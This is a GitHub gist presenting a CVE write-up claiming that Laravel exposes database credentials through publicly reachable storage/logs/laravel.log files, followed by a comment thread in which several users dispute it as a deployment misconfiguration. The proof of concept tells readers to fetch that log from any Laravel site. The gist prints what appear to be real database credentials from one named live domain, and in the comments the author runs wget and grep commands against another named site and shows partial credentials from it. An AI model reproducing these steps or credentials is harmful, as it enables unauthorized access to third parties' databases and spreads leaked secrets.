-
-
Save whiteman007/43bd7fa1fa0e47554b33f0cf93066784 to your computer and use it in GitHub Desktop.
CVE-ID: CVE-2024-29291 | |
Description: | |
A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials. | |
Additional Information: | |
None. | |
Risk: | |
High. | |
Vulnerability Type: | |
Database credential leak vulnerability. | |
Vendor of Product: | |
Laravel Framework. | |
Affected Product Code Base: | |
Laravel FRAMEWORK - 8.* - 11.* | |
Affected Component: | |
laravel.log. | |
Attack Type: | |
Remote. | |
Impact Information Disclosure: | |
True. | |
Attack Vectors: | |
Database credential leak vulnerability. | |
Description: | |
Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved. | |
Proof of concept: | |
Go to any Laravel-based website and navigate to storage/logs/laravel.log. | |
Open the file and search for "PDO->__construct('mysql:host=". | |
The result: | |
shell | |
Copy code | |
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) | |
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) | |
Credentials: | |
Username: u429384055_jscv | |
Password: Jaly$$a0p0p0p0 | |
Host: sql1... | |
Now you can login to the database. | |
By: Huseein Amer | |
Facebook: https://www.facebook.com/hussein.amer.75491/ | |
This only works in misconfigured apps, right?
/storage
should be symlinked to/storage/app/public
when usingphp artisan storage:link
The problem lies in the laravel.log file, where the system stores the login data in the log file
if you can navigate to storage/logs/laravel.log you can just as well do cat .env
Also, turn off debug mode please.
To anyone reading this: This does not deserve a CVE. Don't waste your time.
This is a misconception based on a deployment error.
The app should have been in prod logging mode with a loglevel higher than debug
AND the /public
folder should have been the root of the web path so that storage/logs
was never accessible in the first place.
If storage/logs
is accessible, so is .env
, config/
and vendor/
if you can navigate to storage/logs/laravel.log you can just as well do
cat .env
Also, turn off debug mode please.To anyone reading this: This does not deserve a CVE. Don't waste your time.
This is a misconception based on a deployment error. The app should have been in prod logging mode with a loglevel higher than
debug
AND the/public
folder should have been the root of the web path so thatstorage/logs
was never accessible in the first place. Ifstorage/logs
is accessible, so is.env
,config/
andvendor/
mr Jelle-SamsonIT
Connection data can be displayed even if the .env file cannot be read by an attacker. It is enough just to have the ability to read the log file.
As on the site
https://www.digo.sa/.env
It shows you that 403
Forbidden
Cannot display data from env file
Go
https://www.digo.sa/storage/logs/laravel.log
Write it down
wget https://www.digo.sa/storage/logs/laravel.log
and
grep host laravel.log
and you can now show
'mysql:host=127....', 'africansc_afric...', 'TYumh2rsJ0WP7Qe...'
As for the eligibility to grant CVE, mitre.org has classified it as high risk
Read this documentation https://laravel.com/docs/11.x/filesystem#the-public-disk
it says "The public disk included in your application's filesystems configuration file is intended for files that are going to be publicly accessible. By default, the public disk uses the local driver and stores its files in storage/app/public
"
Thus storage/logs should not be accessible.
The Connector class could make use of the SensitiveParameter attribute. Seems appropriate
This only works in misconfigured apps, right?
/storage
should be symlinked to/storage/app/public
when usingphp artisan storage:link